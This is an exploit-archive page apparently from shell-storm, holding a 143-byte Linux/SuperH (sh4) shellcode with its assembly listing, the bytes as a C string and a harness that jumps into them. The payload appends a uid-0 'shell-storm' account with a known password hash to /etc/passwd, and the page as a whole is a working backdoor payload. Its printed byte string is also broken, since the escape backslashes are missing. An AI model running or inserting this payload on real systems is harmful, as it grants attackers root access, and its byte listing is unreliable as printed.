
# Title : SuperH (sh4) Add root user with password
# Published : 2011-06-23
# Author :
# Previous Title : linux/x86-64 execve(/bin/sh) 52 bytes
# Next Title : Linux/MIPS - add user(UID 0) with password - 164 bytes


/*
** Title:     Linux/SuperH - sh4 - add root user with password - 143 bytes
** Date:      2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author:    Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
** Information:
** -------------
**               - user: shell-storm
**               - pswd: toor
**               - uid : 0
** 
** open:
**         mov      #5, r3
**         mova     @(130, pc), r0
**         mov      r0, r4
**         mov      #255, r13
**         mov      #4, r12
**         mul.l    r13, r12
**         sts      macl, r5
**         add      #69, r5
**         mov      #84, r13
**         mov      #5, r12
**         mul.l    r13, r12
**         sts      macl, r6
**         trapa    #2
**         mov      r0, r11
** 
** write:
**         xor      r6, r6
**         xor      r5, r5
**         mov      #4, r3
**         mov      r11, r4
**         mova     @(20, pc), r0
**         mov      r0, r5
**         mov      #72, r6
**         trapa    #2
** 
** close:
**         mov      #6, r3
**         mov      r11, r4
**         trapa    #2
** 
** exit:
**         mov      #1, r3
**         xor      r4, r4
**         trapa    #2
**         
** user:
**         .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn"
** 
** file:
**         .string "@@@/etc/passwd"
**
**
** The '@@@' is just for alignment.
**
*/

#include <stdio.h>
#include <string.h>


/*
 * SC: the 143-byte Linux/SuperH (sh4) shellcode from the listing in the
 * header comment, packed into one C string so main() can measure it with
 * strlen() and jump into it.
 *
 * Layout is part of the behaviour: the open and write blocks find their
 * string operands with PC-relative `mova` (`mova @(130, pc)` for the path,
 * `mova @(20, pc)` for the passwd line, per the listing), so the byte offset
 * of every fragment below matters. Do not reorder, re-split or pad these
 * literals; the trailing "@@@" is alignment padding, as the header says.
 *
 * NOTE(review): the backslash of every "\xNN" escape appears to have been
 * stripped from this page during extraction; as printed, these literals are
 * plain ASCII text ("x05xe3..."), not the bytes the comments describe.
 */
char *SC = 
           /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd
            * The listing builds the flags as 255*4+69 (0x441) and the mode as
            * 84*5 (0644 octal) with mul.l/sts macl rather than immediates;
            * r3 holds the syscall number (5) and `trapa #2` issues the call. */
           "x05xe3x20xc7x03x64xffxed"
           "x04xecxd7x0cx1ax05x45x75"
           "x54xedx05xecxd7x0cx1ax06"
           "x02xc3"

           /* r11 = fd  (syscall result is returned in r0; kept in r11 for
            * the later write and close) */
           "x03x6b"

           /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72)
            * r3 = 4; r4 = r11; r5 = address of the passwd line via mova;
            * r6 = 72 (byte count, from `mov #72, r6` in the listing). */
           "x6ax26x5ax25x04xe3xb3x64"
           "x04xc7x03x65x48xe6x02xc3"

           /* close(fd)  r3 = 6, r4 = r11 */
           "x06xe3xb3x64x02xc3"

           /* exit(0)  r3 = 1, r4 = 0 -- control never returns to main() */
           "x01xe3x4ax24x02xc3"

           /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn
            * The passwd-format line appended to the file (uid 0, gid 0). */
           "x73x68x65x6cx6cx2dx73x74"
           "x6fx72x6dx3ax24x31x24x4b"
           "x51x59x6cx2fx79x72x75x24"
           "x50x4dx74x30x32x7ax55x54"
           "x57x6dx4dx76x50x57x63x55"
           "x34x6fx51x4cx73x2fx3ax30"
           "x3ax30x3ax72x6fx6fx74x3a"
           "x2fx72x6fx6fx74x3ax2fx62"
           "x69x6ex2fx62x61x73x68x5c"
           "x6e"

           /* @@@/etc/passwd  -- three pad bytes, then the path that open()
            * reaches through its mova offset */ 
           "x40x40x40x2fx65x74x63x2f"
           "x70x61x73x73x77x64";


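/*
 * Test harness: print the length of SC, then transfer control to its bytes
 * through an indirect call.
 *
 * Returns 0 only if the called code returns; the listed shellcode ends in
 * exit(0), so on a successful run this function never reaches `return`.
 */
int main(void)
{
    /* strlen() yields size_t, so %zu is the matching conversion; the
     * original %d is undefined behaviour on 64-bit targets. Note strlen()
     * stops at the first NUL byte, so the printed length only equals the
     * payload size while the encoded bytes contain no 0x00. */
    fprintf(stdout, "Length: %zu\n", strlen(SC));

    /* Jump into the data bytes of SC. This requires the page holding SC to
     * be mapped executable; string literals are normally placed in a
     * read-only, non-executable section by modern toolchains, so on an
     * NX-enforcing system this call is expected to fault rather than run. */
    (*(void(*)()) SC)();
    return 0;
}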